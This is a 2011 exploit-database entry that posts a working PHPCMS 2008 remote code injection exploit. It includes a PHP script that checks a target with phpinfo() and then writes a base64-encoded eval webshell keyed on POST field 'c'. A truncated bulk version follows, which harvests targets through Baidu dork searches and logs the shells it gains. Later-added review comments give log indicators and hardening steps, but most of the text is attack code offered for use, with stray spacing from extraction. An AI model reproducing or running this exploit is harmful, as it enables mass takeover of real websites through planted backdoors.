PHPCMS 2008 latest 0day, with bulk EXP added - vulnerability warning - the black bar safety net

2011-11-12T00:00:00
ID MYHACK58:62201132337
Type myhack58
Reporter 佚名
Modified 2011-11-12T00:00:00

Description

This one has been played to death, so I am throwing it out for everyone. The hit rate is still good right now. It gets a shell directly. The password of the one-line webshell is c

EXP:

!/ usr/bin/php

<? php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Trojan Google Dork:Powered by Phpcms 2 0 0 8 code by secr +---------------------------------------------------------------------------+ '); if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' host path host: target server (ip/hostname) path: path to phpcms Example: php '.$ argv[0].' localhost /phpcms/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(0); set_time_limit(0); $host = $argv[1]; $path = $argv[2]; $exp ='/yp/product. php? view_type=1&catid=&pagesize={${fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz5vaw))}}&areaname=0&order=';

// NOTE(review): this listing was published collapsed onto a few long lines and carries
// extraction damage (stray spaces inside tokens); it is kept byte-for-byte as it appears.
//
// What the line above shows, read from a defender's side:
//  - The request goes to /yp/product.php and carries a PHP `{${ ... }}` expression in the
//    `pagesize` query parameter. That has an effect only if the server evaluates the
//    parameter as PHP string syntax. The vulnerable server-side code is not on this page,
//    so the exact sink is an assumption to confirm against the PHPCMS source.
//  - The injected expression writes a file. Its name is base64-encoded and corresponds to
//    the /yp/shell.php path fetched further down. Going by the page description ("password
//    is c"), the content is a one-line backdoor keyed on a POST field named `c`, followed
//    by an `ok` marker that the script checks for afterwards.
//
// Things to look for in logs and on disk:
//  - `{${`, `base64_decode(` or `phpinfo()` inside the query string of /yp/product.php;
//  - .php files under the yp/ directory that are not part of the installation.
//
// Hardening that follows from the above: treat `pagesize` strictly as an integer before it
// reaches any evaluated string, apply the vendor fix (no fixed version is named on this
// page), and keep the application directories non-writable for the web-server account
// where the deployment allows it.
//
// The line below runs three requests in a row: a probe that injects `{${phpinfo()}}` and
// greps the response for "php.ini", the write request held in $exp, and a fetch of
// /yp/shell.php that checks for the `ok` marker. That short sequence from one client is
// itself a usable correlation pattern.
//Detect the presence of the vulnerability echo "[+] Try to determine the Bug....\ n"; $returnstr=httpRequestGET('/yp/product. php? view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order='); if(preg_match('/(php. ini)/i',$returnstr)){ echo("[+] This site has a Bug! We Will Be Try To Exploit It\n"); } else { exit("[-] Exploit Failed! This site has No Bug!\ n"); } //If there is a vulnerability, it sends EXP Getshell echo "[+] Try to create webshell....\ n"; httpRequestGET($exp); $content=httpRequestGET("/yp/shell.php"); //Send EXP after the acquisition of the shell to detect when the page has OK character, if there is, then GETWebshell success. //print_r($content); if(strpos($content,'ok')){ echo "[+] Expoilt successfully....\ n"; echo "[+] Webshell:http://$host{$path}yp/shell. php\n"; }else{ exit("[-] Exploit Failed!\ n"); }

// NOTE(review): httpRequestGET($url) hand-builds a raw HTTP/1.1 request line from the
// globals $host and $path plus $url, sends it over a socket opened with fsockopen(), and
// returns everything read from the socket until EOF as one string.
// $method is never assigned inside the function before the ternary reads it.
// The request headers are fixed strings. The literal `User-Agent: Payb-Agent` is a
// convenient search term for access logs, though a static header value is trivially
// changed and should only be used together with the URL pattern on /yp/product.php.
//Simulate POST or GET request function. function httpRequestGET($url){ global $host, $path; $method=$method?' POST':'GET'; $payload = $method." ".$ path.$ url." HTTP/1.1\r\n"; $payload .= "Accept: /\r\n"; $payload .= "User-Agent: Payb-Agent\r\n"; $payload .= "Host:" . $host . "\r\n"; $payload .= "Connection: Close\r\n\r\n"; $fp = fsockopen(gethostbyname($host), 8 0); if (!$ fp) { echo 'No response from '.$ host; die; } fputs($fp, $payload); $resp = "; while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4); return $resp; } ?& gt;

The bulk (batch) version of the EXP is as follows, which might be large. Experts, please go easy on it.

<? php

error_reporting(E_ERROR);

set_time_limit(0);

$keyword='inurl:about/joinus' ; // batch keywords

$timeout = 1;

$stratpage = 1;

$lastpage = 1 0 0 0 0 0 0 0;

for ($i=$stratpage ; $i<=$lastpage ; $i++ ){

$array=ReadBaiduList($keyword,$timeout,$i);

foreach ($array as $url ){

$url_list=file('url.txt');

if (in_array("$url\r\n",$url_list)){

echo "[-] Links repeat\n";

}else{

$fp = @fopen('url.txt', 'a');

@fwrite($fp, $url."\ r\n");

@fclose($fp);

print_r("

[-] Get...... $url\r\n");

if(okbug($url)){

$exploit=exploit($url);

$ors=okor($url);

if ($ors){

echo "[*] Shell:-> ".$ url."/ yp/fuck. php\n";

$fp = @fopen('shell.txt', 'a');

@fwrite($fp, $url."/ yp/fuck. php\r\n");

@fclose($fp);

}

}else{

print "[-] No Bug!\ n";

}
